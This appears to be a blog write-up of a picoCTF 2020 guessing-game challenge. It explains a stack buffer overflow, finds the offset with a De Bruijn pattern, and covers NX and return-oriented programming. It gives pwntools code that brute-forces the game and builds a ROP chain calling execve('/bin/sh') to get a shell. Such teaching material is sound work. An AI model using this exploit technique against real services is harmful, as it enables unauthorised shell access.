This year I decided to compete in the picoCTF 2020 Mini-Competition as my first CTF.

This is the first post in a series covering the tasks of the competition.

The task

A screenshot of the competition task. — The shown task can be found here

The code

int main(int argc, char **argv){

	int res;
	
	printf("Welcome to my guessing game!\n\n");
	
	while (1) {
		res = do_stuff();
		if (res) {
			win();
		}
	}
	
	return 0;
}

The program consists of a loop that calls do_stuff(). If do_stuff() returns a nonzero value, win() is called as well. Examining win(), we can spot a buffer overflow:

What is a buffer overflow?

For an intro to C undefined behaviour I would recommend this article; this aside paraphrases it (badly).

The C standard describes what an abstract machine does when you hand it a C program. It also defines what actions of this machine are side effects that interact with its execution environment.

What the abstract machine does when running a program is more or less the “meaning” of the program.

If you’re able to tell what would happen if you run a piece of C code (what it means), you’re able to run that machine in your mind.

Computers are different kinds of machines and are not able to run C programs directly.

So a compiler is needed to map the C program onto a native program. It ensures that when we execute the native program, it behaves exactly (with regard to side effects) like the C program would when run on the abstract machine.

Sadly, the C standard also names a myriad of cases (undefined behaviour) in which the program is actually meaningless. A compiler is allowed to do anything with such programs: it might refuse to compile them and report errors, or it might turn the program into one that calls the cops on you when it runs.

In reality, many of those programs aren’t actually meaningless but let the underlying implementation (how the abstract machine is mapped onto your real machine) shine through.

A buffer overflow (accessing an array past its bounds) is one of those cases.

#define BUFSIZE 100

void win() {
	char winner[BUFSIZE];
	printf("New winner!\nName? ");
	fgets(winner, 360, stdin);
	printf("Congrats %s\n\n", winner);
}

We are prompted to enter a name. fgets() reads up to 359 characters and appends a null character, so up to 360 bytes are written into a buffer that holds only 100. This results in a buffer overflow if we enter a name longer than 99 characters.
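The arithmetic behind that overflow can be sketched in a few lines of Python. This only models the sizes involved, not the real stack layout, and the helper names fgets_bytes_written and overflow_bytes are made up for this illustration.

```python
BUFSIZE = 100      # size of the `winner` buffer in win()
FGETS_LIMIT = 360  # size argument passed to fgets()


def fgets_bytes_written(input_len, limit=FGETS_LIMIT):
    """Bytes fgets() stores for an input line of input_len bytes
    (newline included): at most limit - 1 bytes plus a trailing NUL."""
    return min(input_len, limit - 1) + 1


def overflow_bytes(input_len, bufsize=BUFSIZE, limit=FGETS_LIMIT):
    """How many bytes land past the end of the buffer."""
    return max(0, fgets_bytes_written(input_len, limit) - bufsize)


for length in (99, 100, 1000):
    print(length, "input bytes ->", overflow_bytes(length), "bytes past the buffer")
```

The largest possible overshoot is what matters later: it has to be big enough to reach the saved return address and hold the rest of the payload.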

To exploit the buffer overflow, we need to win the game.

But how do we win the game?

long increment(long in) {
	return in + 1;
}

long get_random() {
	return rand() % BUFSIZE;
}

int do_stuff() {
	long ans = get_random();
	ans = increment(ans);
	int res = 0;
	
	printf("What number would you like to guess?\n");
	char guess[BUFSIZE];
	fgets(guess, BUFSIZE, stdin);
	
	long g = atol(guess);
	if (!g) {
		printf("That's not a valid number!\n");
	} else {
		if (g == ans) {
			printf("Congrats! You win! Your prize is this print statement!\n\n");
			res = 1;
		} else {
			printf("Nope!\n\n");
		}
	}
	return res;
}

Sadly, there seems to be no way to cheat; we just have to get lucky and guess a number between 1 and 100. However, computers are fast, so that should not be an issue.

So before diving into exploiting the buffer overflow, we should be able to reliably win the game.
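To get a feeling for how many guesses that takes, here is a rough estimate. It assumes every round is an independent draw with a 1 in 100 chance of matching a fixed guess, which is a simplification because rand() is a deterministic pseudo-random generator. The names P_WIN and chance_of_win_within are hypothetical.

```python
P_WIN = 1 / 100  # assumed chance that a fixed guess matches in one round


def chance_of_win_within(attempts, p=P_WIN):
    """Probability of at least one correct guess in `attempts` rounds."""
    return 1 - (1 - p) ** attempts


# Mean of a geometric distribution: average number of rounds until the first win
expected_attempts = 1 / P_WIN

print(f"expected attempts: {expected_attempts:.0f}")
for n in (100, 300, 500):
    print(f"{n} attempts: {chance_of_win_within(n):.1%}")
```

Under that assumption a few hundred attempts are almost always enough.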

For this, we can use pwnlib:

from pwn import *
import time

LOCAL = True

local_bin = "./vuln"

if LOCAL:
    p = process(local_bin)

else:
    p = remote('jupiter.challenges.picoctf.org', 50581)

progress = log.progress('Winning the game...')
attempts = 1
start_time = time.time()

# win the game

p.sendline(b'1')
result = p.recvline_contains((b'Nope!', b'New winner'))
while result == b'Nope!':
    current_time = time.time()
    time_per_attempt = (current_time - start_time) / attempts
    needed_attempts = 300 - attempts
    eta = needed_attempts * time_per_attempt

    progress.status('{}/~300 attempts, {:0.3}s per attempt ETA~{:0.3}s'.format(attempts, time_per_attempt, eta))
    attempts += 1
    p.sendline(b'1')
    result = p.recvline_contains((b'Nope!', b'New winner'))
progress.success('We won!!')

This code is set up so we can develop our exploit locally (with a debugger etc.) and then switch to remote once we are confident that it works.

All this code does is repeatedly guess 1 and send it to the process until we’ve won.

Now we can try to win the game:

And remotely so we can see our fancy progress bars and feel prouder:

Now that we can reliably reach the buffer overflow after some time, we’re ready to exploit it.

The exploit

The stack stores the current return address close to the buffer we are overflowing. Our first step is to find out exactly at which offset from the start of the buffer that address sits. For that we could manually inspect the program in a debugger, but pwnlib supplies a handy utility.

pwnlib.util.cyclic.cyclic(1000, n=8) generates a De Bruijn sequence.

This is a sequence in which every substring of length 8 occurs at most once.

So [0..8] != [1..9], [1..9] != [2..10], etc. This implies that if we see an arbitrary slice [x..(x+8)] of the sequence, we can figure out x just by looking at its content.
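To make the uniqueness property tangible, here is a small pure-Python sketch of a De Bruijn generator. It is the textbook recursive construction, not pwnlib's implementation, and it uses a tiny alphabet and a window length of 3 instead of 8 to keep the output short.

```python
def de_bruijn(alphabet, n):
    """Return a De Bruijn sequence over `alphabet` in which every
    substring of length n occurs at most once."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in seq)


pattern = de_bruijn("abcd", 3)
windows = [pattern[i:i + 3] for i in range(len(pattern) - 2)]
print(len(windows) == len(set(windows)))  # every window is unique

# Given only a slice, we can recover where it came from.
leak = pattern[17:20]
print(leak, pattern.find(leak))
```

Because no window repeats, a plain substring search is enough to turn a leaked slice back into its position.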

We overwrite the return address with an unknown part of the sequence, and the program tries to jump to that address.

This results in a SIGSEGV, a result of accessing invalid memory, showing us exactly what address was accessed.

This information is enough to figure out at which offset from the buffer the return address is stored, 120 in our case.
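The step from the crash address back to an offset is roughly what a cyclic lookup does for us. Here is a minimal sketch without pwnlib. The pattern is a stand-in made of numbered 8-byte chunks, not a real De Bruijn sequence, and RET_OFFSET is simply set to the value from above for illustration.

```python
import struct

# Stand-in pattern, NOT a real De Bruijn sequence:
# 8-byte chunks "0000000|", "0000001|", ... (1000 bytes in total)
pattern = b"".join(b"%07d|" % i for i in range(125))

RET_OFFSET = 120  # where the saved return address sits in this illustration

# On x86-64 the 8 pattern bytes are loaded as a little-endian 64-bit integer,
# which is the address reported in the crash.
fault_addr = struct.unpack("<Q", pattern[RET_OFFSET:RET_OFFSET + 8])[0]

# Reverse the step: integer -> the 8 bytes as they sat in memory -> offset.
leaked = struct.pack("<Q", fault_addr)
print(hex(fault_addr), leaked, pattern.find(leaked))
```

The only subtle part is the byte order: the address has to be turned back into little-endian bytes before searching the pattern.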

OFFSET = None
if OFFSET is None:
    log.info('Determining OFFSET...')
    p.clean()
    # Send a De Bruijn pattern as the name so the crash address reveals the offset
    payload = cyclic(1000, n=8)
    p.sendline(payload)
    p.wait()
    # Assumes the crash left a core dump at ./core
    core = Corefile('./core')
    found_offset = cyclic_find(core.fault_addr, n=8)
    log.info('Found OFFSET: {}, set the variable and rerun the exploit'.format(found_offset))
    exit()

At this point we are able to continue execution at an arbitrary address. Combined with our ability to write arbitrary data (e.g. a program) into memory, this used to be enough to run shellcode.

Nowadays, we usually cannot execute code from stack memory because of executable space protection (NX). We are able to write a program into the buffer, but trying to execute it would result in a crash.

To execute a (nearly) arbitrary program, we need to use Return-oriented programming.

What is Return-oriented programming (ROP)?

In the days before NX Protection, we would just write our shellcode and then overwrite the return address on the stack to execute it.

Because of NX Protection we’re not allowed to execute data that we’ve written but we can still return to an arbitrary address.

We’re able to jump to any code that already exists.

The chance that any random code snippet is exactly the shellcode that we need is fairly slim, but there are interesting observations to be made.

Any function has to return at some point; if it leaves the stack balanced, its return pops the next address from the stack and jumps there.

So we’re able to not just call any single function but string multiple function calls together by placing addresses one after the other onto the stack.

The second interesting observation is that we don’t have to call the entire function, we can call the last few instructions before the return.

Any function, no matter how complicated, ends in a few fairly generic assembly instructions followed by a return.

We don’t need one function that exactly executes our shellcode, we just need many functions that execute a single or a few instructions of it before returning.

Those function epilogs are called ROP gadgets, and there are multiple tools like ROPgadget that let us search through the binary to find them.
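The chaining idea can be modelled with a toy interpreter. This is only a sketch of the mechanism: the gadget addresses 0x1000 and 0x2000 are made up, and run_chain and pop_into are hypothetical helpers, not part of any tool.

```python
def pop_into(reg):
    """Build the body of a `pop <reg>; ret` gadget."""
    def action(regs, stack):
        regs[reg] = stack.pop(0)  # `pop`: take the next word off the stack
    return action


# Hypothetical gadget addresses, made up for this illustration.
GADGETS = {
    0x1000: ("pop rax; ret", pop_into("rax")),
    0x2000: ("pop rdi; ret", pop_into("rdi")),
}


def run_chain(stack, gadgets):
    """Toy model of a ROP chain: `stack` is a list of 64-bit words,
    lowest address first; every gadget ends with an implicit `ret`."""
    regs = {"rax": 0, "rdi": 0}
    trace = []
    stack = list(stack)
    while stack:
        addr = stack.pop(0)       # `ret`: pop the next address and jump there
        name, action = gadgets[addr]
        trace.append(name)
        action(regs, stack)       # gadget body, consumes its operands
    return regs, trace


chain = [0x1000, 59, 0x2000, 0xdeadbeef]
regs, trace = run_chain(chain, GADGETS)
print(trace)
print({name: hex(value) for name, value in regs.items()})
```

Each gadget consumes its own operands from the stack, and the implicit return at its end picks up the address of the next gadget, which is why addresses and data simply alternate in the chain.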

Pwnlib exposes tools to find the necessary gadgets. The syntax for that is not documented too well, so I needed to use an external tool to find one of the gadgets.

The shellcode

Our goal is to gain shell access. The easiest way to accomplish this is to call the execve() system call with /bin/sh.

Finding a tailored data copy routine, or writing one ourselves within the constraints, is fairly difficult. Luckily we are on a 64-bit system and our payload /bin/sh (7 characters plus a terminating null byte) fits entirely within one register.
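A quick check of that claim, using only the standard library. The variable names SH and as_register are just for this illustration.

```python
import struct

SH = b"/bin/sh\x00"  # 7 characters plus the terminating NUL byte
print(len(SH))       # size in bytes, must not exceed one 64-bit register

# The value a register holds after popping these 8 bytes off the stack
# (x86-64 is little-endian, so the first byte is the least significant).
as_register = struct.unpack("<Q", SH)[0]
print(hex(as_register))

# Storing the register to memory reproduces the original string.
print(struct.pack("<Q", as_register) == SH)
```

So a single pop plus a single store is enough to place the whole string in memory, with no copy loop needed.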

# Assumes OFFSET is the integer found above (120) and
# SH_STRING is the 8 bytes b'/bin/sh\x00'
payload = (
# Fill the buffer up to the point where the next 8 bytes
# overwrite the return address
b'A' * OFFSET +
# POP the next value into RAX
p64(POP_RAX) +
# We use .bss as our scratchpad, it is readable and writable
p64(elf.bss()) +
# POP the string /bin/sh into RDX
p64(POP_RDX) +
SH_STRING +
# Move the contents of RDX (/bin/sh) into the memory
# pointed to by RAX (the beginning of the .bss section)
p64(MOV_PRAX_RDX) +
# Prepare for calling execve,
# load its system call number (59) into RAX
p64(POP_RAX) +
p64(59) +
# Load the address of the /bin/sh string into RDI,
# this is the pathname argument of execve
p64(POP_RDI) +
p64(elf.bss()) +
# We do not have any arguments, load a null pointer into RSI
p64(POP_RSI) +
p64(0) +
# We do not need an environment, load a null pointer into RDX
p64(POP_RDX) +
p64(0) +
# Do the system call
p64(SYSCALL))